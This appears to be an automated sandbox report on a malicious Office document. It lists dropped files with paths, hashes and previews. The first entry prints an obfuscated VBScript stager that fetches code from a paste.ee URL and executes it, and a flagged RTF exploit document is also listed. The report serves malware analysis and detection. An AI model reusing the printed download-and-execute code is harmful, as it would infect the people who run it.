                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\loverhappy[1].vbs

                                                  Download File
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):656
                                                  Entropy (8bit):3.52968128866232
                                                  Encrypted:false
                                                  SSDEEP:12:QjQhpDdcsYWUJ+nYWU2plgQDYWUqfHIYWU29RfgRasFf8fEl55X:QjQh9obIYq6kY4FgzcPFf8fmZ
                                                  MD5:340338BDFFD4DEE66D23FBA972F3EF0F
                                                  SHA1:E7940134DEA102B93C9AE0282F0440E790906480
                                                  SHA-256:3A03959A618CFD74DA22F345B33FC6209655B054009927E735DDA859E3EEFC51
                                                  SHA-512:9AE7DBA50F52BBA1A5E60B7DF8011E6326A303718F0C1DB4843027E5DE6651A919F30ABFFEC133C2760BA9CC2AFE09BC248DB0263B15F2FC1085C485F044859C
                                                  Malicious:true
                                                  Preview:..l.e.o.n.t.o.p.h.o.n.o. .=. . .(.I.n.t.(.(.c.a.c.u.m.b.u.-.c.h.i.b.a.r.r.a.d.a.+.1.).*.R.n.d.+.c.h.i.b.a.r.r.a.d.a.).).....S.e.t. .o.p.o.b.a.l.s.a.m.e.i.r.a. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u.e.s.t...5...1.".).....o.p.o.b.a.l.s.a.m.e.i.r.a...O.p.e.n. .".G.E.T.".,.".h.t.t.p.:././.p.a.s.t.e...e.e./.d./.e.A.3.F.M.".,. .F.a.l.s.e.....o.p.o.b.a.l.s.a.m.e.i.r.a...S.e.n.d.....p.o.s.s.e.s.s.i.v.o. .=. .o.p.o.b.a.l.s.a.m.e.i.r.a...R.e.s.p.o.n.s.e.T.e.x.t.....c.l.i.e.n.t.e. .p.o.s.s.e.s.s.i.v.o.....F.u.n.c.t.i.o.n. .c.l.i.e.n.t.e.(.a.f.f.i.x.a.r.).....E.x.e.c.u.t.e.G.l.o.b.a.l. .a.f.f.i.x.a.r.....E.n.d. .F.u.n.c.t.i.o.n.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.doc

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ISO-8859 text, with very long lines (5401), with CRLF, CR, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):67643
                                                  Entropy (8bit):2.9983391639254893
                                                  Encrypted:false
                                                  SSDEEP:1536:+WGDJndDqB5XXd5a8TeKJjZaQHlYARQ1AkcHWF6XyuXfzPZH:re25HTeKJjgAi1AkkRzX7PZH
                                                  MD5:7065A2AB5D47E53ED852CC5130A3EFA8
                                                  SHA1:00B638CE9D0934409A082F12269275F46DDD364C
                                                  SHA-256:8D0A03FFC1C56993FEC78941ADC7388A5C3AFD7D498C1C1FC6470D6C2D621473
                                                  SHA-512:A994D995DF1AE81EB6CBA7DEE659E2F2D09E9D85A6C4E3BAF268560F241AA92779D28626AB6146A9BB97EF5E1AF21D958895E8DE7258B3E0DE6572E689B3D7F0
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.doc, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:{\rt.......{\*\mzeroAsc859185810 \+}.{\196784969*.2%-]58,:6_-&|9.|;+//].=&_>@.7?3~!..2]4,9.`?$$8%.83?+~23^..??$@^<'%??!%2-?8$`?%=1_5>`0#8%0~/?(..]=*:|?:;?!,<1*..;1.)0;[?[^$?.!..8(.?48[257^[?=0?,0.8(7%*]*`._+0?506`.,41!?|9.?<?6?#9$.?_.&.9?8$)%)4:)99)]]3$`@#1*[!?8!).%^6*.~??+((??-3?6~_,?..94@&1.1?72=?.?.+?1%.``9*%!=$^..|4('.#.)|-~,1:]!7>!.`:`_)=.~.|-.><?%..~^>~].!?)~[<70/^9..<,!#;?~.5|%/^.%#?/.'+,@?[^?7)<>?@']_5*$]%>(9=&?6#7`:&$&#!-%?'?7:3[(4)>._@/*2..-63%43:+%5-(?;#(2<,?4:|-]?.->/>>.??8?=?]+?)25%!2?:[0.7[':<.8+?5|.,45)/4]'<|_,!.9>3#)~,^5.:*7.8*90*18^`_3..??4!4[4?;.@[6=0$%?./?9~?'?:[-6>3]'??~?1]+1]=8.~$5;.&[)?-4-.=?(0~^;-_-0%.@7_+]:(~;6**5@7!$./'(,9=877<4.._*;]~<4?-`?|/.(.<|5;>)2<^]%?~6,>(_8#1??%].7':!?:_>.`?%5_1?;;5~#,~++?&_.,'_[.~>_4,|?]]8@..`,5?:&!~-%61?#1_%.:`!0`(+3?5?@7#?[&~+0~'..#87_<?<+.]-~%9~<.:.&@,?&>?/-$|8'|?2<???_???_]%0.*#1@#>`-.!#|~;:#.[2@6?9;4:-.?#.*20%?-!.<9?5`><5;%5^?#.[#1%,(~.$`5~/+.4;_?2)|(@~1<^:,8|;-.??3@@2(~0@9;;&.1(!(*.,75)_?:8;)70?4--?>@0(/'<2#>|:,)?(3%$&0#.4#-08,(8

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FC4CD10.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):330948
                                                  Entropy (8bit):4.973336583207421
                                                  Encrypted:false
                                                  SSDEEP:3072:H0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:H0Bd8yCKdQRzw4muaZ9TARfMDcFi
                                                  MD5:DCAE7225ECC77970D8836A58CA786F0F
                                                  SHA1:4F8EA1764A97BF2656AE37EE2A97A2872A20BD12
                                                  SHA-256:D0F2F18DEA2A0784B706BEE1E5D2B6C8080EFF84606599E790B406328D1910F4
                                                  SHA-512:F239A1BA8E948CD7FB21862A2B06E575628B520E5EC783B5591C112558B84AAACB81A954E0C0C86448202440D56CCF61E4BE4CDE167EB963A1D1EF60873CF347
                                                  Malicious:false
                                                  Preview:....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60FD09D.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):44820
                                                  Entropy (8bit):3.1408341313464048
                                                  Encrypted:false
                                                  SSDEEP:384:3Q0D+9JQLqdyHZDh44aW7lOFzomBHjiy1qDCEY7R7W:3PWJXyH/44tY5iO55ZW
                                                  MD5:107765931CF2C6B285AFD67D32C3898E
                                                  SHA1:8EE4539FABE780C3C743D5063B2519A509527C84
                                                  SHA-256:8F510B40548526F0A2191ECB3DB99FE5FD7AB7300E38393EFCC9898A1242A53A
                                                  SHA-512:EAC27EAE75433F970A009F1EF1AC7435C482EA474502E7205F5744EBDB203AE91AF0774ABB0A18046027E2CA031D3901F26AF535F429C0ACD89473C4FF865580
                                                  Malicious:false
                                                  Preview:....l...........;...............~@..xW.. EMF........1.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.........................................................................e.._............-.......-.......-............. .........-.......-.......-.....G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6.................-.................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CDA89B3.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):884312
                                                  Entropy (8bit):1.2944875740888722
                                                  Encrypted:false
                                                  SSDEEP:1536:k3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:5ux/ZiOE85e+8J2dvRcvMyw
                                                  MD5:B6DFB3AA7AC4A1A52336C30FA821857B
                                                  SHA1:66ECB808A516AC5B07A01CDFCAD65FD7B9907619
                                                  SHA-256:E22202331F689D7568E674B0DCD895DF66FAC5980498F05A846DE244AB3394C4
                                                  SHA-512:A13562F976BCBEEF7D4B4926C37E39BFD4C588EF6E746792B806E6737C91604175395021D4884493D764CE7F0EE2ACC6C7D03A6045A5B4ED6616E5D7E4C9FE94
                                                  Malicious:false
                                                  Preview:....l............................F..C%.. EMF....X~..............................@................................................................F..C%..................Q....}..........................................P...(...x...$}...... ....F..C%..(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D42C9D1.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):34832
                                                  Entropy (8bit):2.8924347952064817
                                                  Encrypted:false
                                                  SSDEEP:384:UCK6Royw05EBi9dFCrt7k2ntxOavsoaLxQ8pv9jBNwpm0H76ATMFiD59nU:UixBapFHmCOeXU
                                                  MD5:7F95BCD5848D13B43F7876F158E60223
                                                  SHA1:752C28C4B0ACECB15F4CE51BD4A1EC37CADBD736
                                                  SHA-256:D3F3C761E2F8AEC9D32CACBD137972CBEF8E8F88D7D70780B34F11130FB10148
                                                  SHA-512:F3CC507FC2A315FEE4EA3A99EDD26F6A81FEE72BDEEDEA89630D82F9453F7E4F29400683E270E84B4D67F098FD247DEBFAA2EBB6F361B9B9BAC60BCB22883849
                                                  Malicious:false
                                                  Preview:....l...........B...............!?..3X.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A02A139.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1505804
                                                  Entropy (8bit):0.5597853734309209
                                                  Encrypted:false
                                                  SSDEEP:768:WfV2z1TFc+NqqwY2vAIqdFJNTTCKakQyHkHcv006aq4/49qXYeNDFIrxWz5eYGoA:WwxB9CK4I0IJXYODScNd8jkQ
                                                  MD5:D1B5ED847C3B4F4104CD2A0BB9044CEA
                                                  SHA1:3F7AAB7C319569125BDE08D70205260105B3E801
                                                  SHA-256:21B61D0A2B2E0A99D1CD5264A042E1C2B595221390E71DC70D6B0807F96CD58F
                                                  SHA-512:9EB99C4D11DA6E4332856AE660AE0C6C7FFE2F8EA00CC802048C5FD99FE02A5AEB6754B5994D36456D2D55DC8FF78BC34B05437E25F68FD21BB64D047032B370
                                                  Malicious:false
                                                  Preview:....l...........R...I............:...M.. EMF....................................@................................................................:...M..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....:...M..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E6FBD07.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):884312
                                                  Entropy (8bit):1.2944965349348616
                                                  Encrypted:false
                                                  SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                  MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                  SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                  SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                  SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                  Malicious:false
                                                  Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE36859E.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1505804
                                                  Entropy (8bit):0.5598195116789372
                                                  Encrypted:false
                                                  SSDEEP:768:tfV2z1TFc+NqqwY2vAIqdFJNTTCKakQyHkHcv006aq4/49qXYeNDFIrxWz5eYGoA:twxB9CK4I0IJXYODScNd8jkQ
                                                  MD5:197D701BE1DF99B08087A2BFBF7E08BB
                                                  SHA1:D89B035A0C283D1C3C4AF3CD443F9B67A25DD144
                                                  SHA-256:812AC6359E77B09B88A96DA0EEBF1E29651798C7F2155489FE165209EDBFC791
                                                  SHA-512:10FCCFB459011ECE38EFEA1F91CBEE41A4517B1954358220E05133F1CA024C0DBD9B188C54E6590F703B1F926EA39F5C51ABC582BB6664719BBD5C715AF954FB
                                                  Malicious:false
                                                  Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C715018.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):34768
                                                  Entropy (8bit):2.6727388236798624
                                                  Encrypted:false
                                                  SSDEEP:768:3hMl9NqNuTPrgSxvgQRFCazvhcCfcpIR0nPvT4RUg:32LpA4R9
                                                  MD5:D01AE7E16E2C7ECF1057683C5CCDE824
                                                  SHA1:35C1D0D9385CF87AD24B67756C9BE1B59709523F
                                                  SHA-256:B6E315D2C281C7977E3400F4C8BEBDCB66724D2A4CC7F3BA56D39C8411871DC2
                                                  SHA-512:C0A9B7B8D065ACFB5246541DA2732BFB96FA5F5160D54893A48096DC0ADA50C25EC0F1F3F6E47CFF547A98C265D959436DA8CA8F47D68E48AF627EF1734F8391
                                                  Malicious:false
                                                  Preview:....l..............."............D...`.. EMF...................................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB4125FA.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):433328
                                                  Entropy (8bit):5.8204227855493835
                                                  Encrypted:false
                                                  SSDEEP:6144:Fifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:Fl7kwvqULUVS
                                                  MD5:D3B076F2AEAF6579FB36B5888DBD192E
                                                  SHA1:889BCB5FBECABBC6B30D5D18E6F24207DF0B8509
                                                  SHA-256:F44C189BF21F6602DD7CE7613765ED09D53CD34689128EDCCED73E512A34C08F
                                                  SHA-512:BAFBC3941C8E9B901227190FB7B6B9AFE96AA2AD26E3D91D370F593BB5D9C17B7E60C775982D5EAE006F196EEF43E07EFF7BE77A75AF02617E14C0FAB3B2B432
                                                  Malicious:false
                                                  Preview:....l...........[................S..%;.. EMF........t...........................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\.......'.......................%...........................................................L...d.......D...[...........D...\...D...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{67551F0E-90CB-489F-80A1-F0E70E1E7186}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):14848
                                                  Entropy (8bit):5.846186791019473
                                                  Encrypted:false
                                                  SSDEEP:96:j8vDU2NUHkwfXPdkauO/lQmCkwfmdkauO/lQlUHkwfWJodkauO/lQPUHkwfmdkaY:jmu3PdWGdpUodPGdpPd
                                                  MD5:C2AA61B1B2CAD8CC71B4A7F2105A64D7
                                                  SHA1:0FDF174B6C47DFBFF11B384315374D07647D35F8
                                                  SHA-256:2A8016AC8CCD2E0A9E1214AF881CFC4325C7A2814E8B4704CF1281FBA7BFEE63
                                                  SHA-512:01FA7626517074BB1F21DAA9A3DF0B50AAD722D421FABB3A83B22BA0C9617B1D0484D4B49FDB18D022D27286F78CDFCF5512A947529EABC2C774BA2F807DA57E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4B24CF07-2A69-49CB-8C65-C73E89BB014F}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C71CDE76-C153-47E7-82A4-3686EC7190CE}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11776
                                                  Entropy (8bit):3.5018249557586762
                                                  Encrypted:false
                                                  SSDEEP:192:H+wY/yvbSwQo11ryEprT4l2lWFglNQcqBjKDqL5NkoecJ0eTtYOoCR2dnE+x+P6x:HD7bGo11LNlsgijKD+NqcJ0UnD21x+Cx
                                                  MD5:3A113DBE5236E63A26C044A9BCF82BFC
                                                  SHA1:8FECB25EB3864937FBEA6AF5994721D6D91F041D
                                                  SHA-256:F6A65D4F520E0CFF90A31EDEE7591276914E32278D3178C7893EE96FE2266524
                                                  SHA-512:834F3212B3F58BBA3F90A993BB99EB30AF70F7D4096399A3B2C287F2D60D7D7FBB10EA3352A16FB36DC78F020ED203A95A42F37D96A875C61C0BF83C68400ADA
                                                  Malicious:false
                                                  Preview:........9.6.7.8.4.9.6.9.*...2.%.-.].5.8.,.:.6._.-.&.|.9...|.;.+././.]...=.&._.>.@...7.?.3.~.!.....2.].4.,.9...`.?.$.$.8.%...8.3.?.+.~.2.3.^.....?.?.$.@.^.<.'.%.?.?.!.%.2.-.?.8.$.`.?.%.=.1._.5.>.`.0.#.8.%.0.~./.?.(.....].=.*.:.|.?.:.;.?.!.,.<.1.*.....;.1...).0.;.[.?.[.^.$.?...!.....8.(...?.4.8.[.2.5.7.^.[.?.=.0.?.,.0...8.(.7.%.*.].*.`..._.+.0.?.5.0.6.`...,.4.1.!.?.|.9...?.<.?.6.?.#.9.$...?._...&...9.?.8.$.).%.).4.:.).9.9.).].].3.$.`.@.#.1.*.[.!.?.8.!.)...%.^.6.*...~.?.?.+.(.(.?.?.-.3.?.6.~._.,.?.....9.4.@.&.1...1.?.7.2.=.?...?...+.?.1.%...`.`.9.*.%.!.=.$.^.....|.4.(.'...#...).|.-.~.,.1.:.].!.7.>.!...`.:.`._.).=...~...|.-...>.<.?.%.....~.^.>.~.]...!.?.).~.[.<.7.0./.^.9.....<.,.!.#.;.?.~...5.|.%./.^...%.#.?./...'.+.,.@.?.[.^.?.7.).<.>.?.@.'.]._.5.*.$.].%.>.(.9.=.&.?.6.#.7.`.:.&.$.&.#.!.-.%.?.'.?.7.:.3.[.(.4.).>..._.@./.*.2.....-.6.3.%.4.3.:.+.%.5.-.(.?.;.#.(.2.<.,.?.4.:.|.-.].?...-.>./.>.>...?.?.8.?.=.?.].+.?.).2.5.%.!.2.?.:.[.0...7.[.'.:.<...8.+.?.5.|...,.4.5.)./.4.].'.<.|._.,.!...9.>.3.

                                                  C:\Users\user\AppData\Local\Temp\0hwje0gp.a03.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\ec0uve3f.2yv.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\nd1hg0ny.nwn.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\nkvws4fx.32o.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\{1F47FAFB-9561-423A-BC6B-1668495193B4}

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025604735679189933
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPc4lz5HvxggLR5eZUtQM3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP1RtXuavYg3J/
                                                  MD5:2EAD2E5BDF03AE8914386A7D69256F34
                                                  SHA1:294C612F68D41C8FB2632DA2F9C704666109BCE4
                                                  SHA-256:F9AFB028BA1C1AD8482C126F57E1B6A1D6B19FC7B1EBF7C3146C2BE268B62933
                                                  SHA-512:17801549BF6991ABE7AAC5F39C759015D7B06F1BAA18D7462E25623AB9A5BA65A4A4BE2E54AA5E517A0E1F2F0BA048DE3012FF087CACA41EDFFBB9EB0D930F47
                                                  Malicious:false
                                                  Preview:......M.eFy...z..0.[.I....u.BS,...X.F...Fa.q...............................B{..K...4.V..........<.>.><.K..s...M......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\{E20E8E37-0C9C-4395-AC78-E8C01565F0D7}

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025523001643528637
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPcYRvxggLRDFbLEltOt7+3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP1dvVMtO2vYg3J/
                                                  MD5:23093CF3CAFC92A74571AFFDDA94308F
                                                  SHA1:2D1784C7B012E3822643CEE49D4CA0EFE4250A89
                                                  SHA-256:7280CF47016F138305F7832DE0F695A192CC2D382CA528FBCE167752EDA63E81
                                                  SHA-512:0FFA94E1578E6116C8D71FAD1F8D8F6AA5BB752EE6D85820ACFACB9C4B96D25244FFD666A18ABF5BBABFF07F46D8A057D1811E54CBABCFD8D50940409958B138
                                                  Malicious:false
                                                  Preview:......M.eFy...z.7....^A.L....V.S,...X.F...Fa.q............................T...l.rC...a.h.3..........4.i..F..Y...A......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF339C70062F0AA3F9.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):17408
                                                  Entropy (8bit):6.684552157723999
                                                  Encrypted:false
                                                  SSDEEP:192:+G3uQOwAvsXfzgQERE02cOlu8q+KxDOOhi83DbK/en/BVAtMQrvniMVhQek4kSy:l2sXk72cOlu2pOC/eJuji3743
                                                  MD5:2D96CCC66B755B2CDB4F89D83E3BF6F9
                                                  SHA1:83A9746444B3A1E40D107E0D677DB054941367BE
                                                  SHA-256:514D9F167086D345FC2505E14E66874446B67249EDF96C1287E7A096EC2E1BE0
